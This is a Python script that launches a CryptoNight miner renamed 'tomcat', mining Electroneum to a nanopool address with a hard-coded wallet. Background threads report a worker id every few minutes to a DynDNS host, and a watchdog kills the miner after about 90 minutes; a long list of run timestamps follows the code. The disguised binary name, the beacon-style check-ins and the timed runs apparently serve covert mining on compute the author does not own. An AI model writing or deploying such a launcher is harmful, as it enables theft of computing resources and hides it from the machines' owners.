import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:12:02.248468
#2018-02-17 16:58:01.287720
#2018-02-17 18:47:04.135563
#2018-02-17 20:34:05.822764
#2018-02-17 22:20:04.649534
#2018-02-18 00:04:02.071965
#2018-02-18 01:54:06.790334
#2018-02-18 03:42:07.044282
#2018-02-18 05:29:06.392541
#2018-02-18 07:20:08.492804
#2018-02-18 09:08:05.519804
#2018-02-18 10:54:05.959107
#2018-02-18 12:42:07.277540
#2018-02-18 14:29:01.435659
#2018-02-18 16:19:03.755593
#2018-02-18 18:08:05.997639
#2018-02-18 19:54:01.503172
#2018-02-18 21:40:04.293650
#2018-02-18 23:27:07.654998
#2018-02-19 01:14:02.162794
#2018-02-19 03:01:02.190320
#2018-02-19 04:47:01.797883
#2018-02-19 06:32:06.362675
#2018-02-19 08:21:06.275728
#2018-02-19 10:11:04.421456
#2018-02-19 11:59:05.187082
#2018-02-19 13:46:06.127356
#2018-02-19 15:37:07.182650
#2018-02-19 17:23:05.419269
#2018-02-19 19:10:10.598312
#2018-02-19 20:57:04.103061
#2018-02-19 22:45:04.456266
#2018-02-20 00:29:07.512999
#2018-02-20 02:18:06.999163
#2018-02-20 04:10:03.192435
#2018-02-20 05:53:04.794911
#2018-02-20 07:40:01.871383
#2018-02-20 09:24:02.133743
#2018-02-20 11:08:01.628949
#2018-02-20 12:54:06.040098
#2018-02-20 14:40:08.460730
#2018-02-20 16:25:10.295108
#2018-02-20 18:11:07.950986
#2018-02-20 20:04:06.850248
#2018-02-20 21:50:09.176508
#2018-02-20 23:31:07.930247
#2018-02-21 01:15:09.075030
#2018-02-21 03:02:04.820178
#2018-02-21 04:48:05.180410
#2018-02-21 06:31:03.910957
#2018-02-21 08:16:06.733023
#2018-02-21 10:02:01.359487
#2018-02-21 12:43:06.131604
#2018-02-21 14:30:11.631497
#2018-02-21 16:18:04.821530
#2018-02-21 18:09:09.316280
#2018-02-21 19:56:05.121664
#2018-02-21 21:44:04.673520
#2018-02-21 23:32:02.121239
#2018-02-22 01:21:08.045944
#2018-02-22 03:10:09.530949
#2018-02-22 04:54:07.806284
#2018-02-22 06:39:05.645943
#2018-02-22 08:28:07.968241
#2018-02-22 10:15:04.105932
#2018-02-22 12:01:01.364377
#2018-02-22 13:46:05.772915
#2018-02-22 15:35:06.000882
#2018-02-22 17:21:03.968353
#2018-02-22 19:08:04.317452
#2018-02-22 21:01:11.428937
#2018-02-22 22:47:01.664898
#2018-02-23 00:35:07.452392
#2018-02-23 02:22:05.602217
#2018-02-23 04:12:01.935492
#2018-02-23 05:56:05.517425
#2018-02-23 07:44:06.484230
#2018-02-23 09:50:08.963292
#2018-02-23 11:55:07.895497
#2018-02-23 13:43:06.418002
#2018-02-23 15:32:10.070879
#2018-02-23 17:22:03.849675
#2018-02-23 19:05:10.873291
#2018-02-23 20:39:08.343041
#2018-02-23 22:14:01.634428
#2018-02-23 23:47:08.716210
#2018-02-24 01:21:05.314063
#2018-02-24 02:57:03.792613
#2018-02-24 04:34:04.969055
#2018-02-24 06:03:01.672118
#2018-02-24 07:40:05.155359
#2018-02-24 09:14:03.444587
#2018-02-24 10:37:06.290496
#2018-02-24 12:23:07.418204
#2018-02-24 14:17:08.368143
#2018-02-24 16:03:06.523948
#2018-02-24 17:56:07.505277
#2018-02-24 19:43:04.054905
#2018-02-24 21:29:04.386501
#2018-02-25 00:13:05.227094
#2018-02-25 04:12:04.607301
#2018-02-25 07:41:06.467545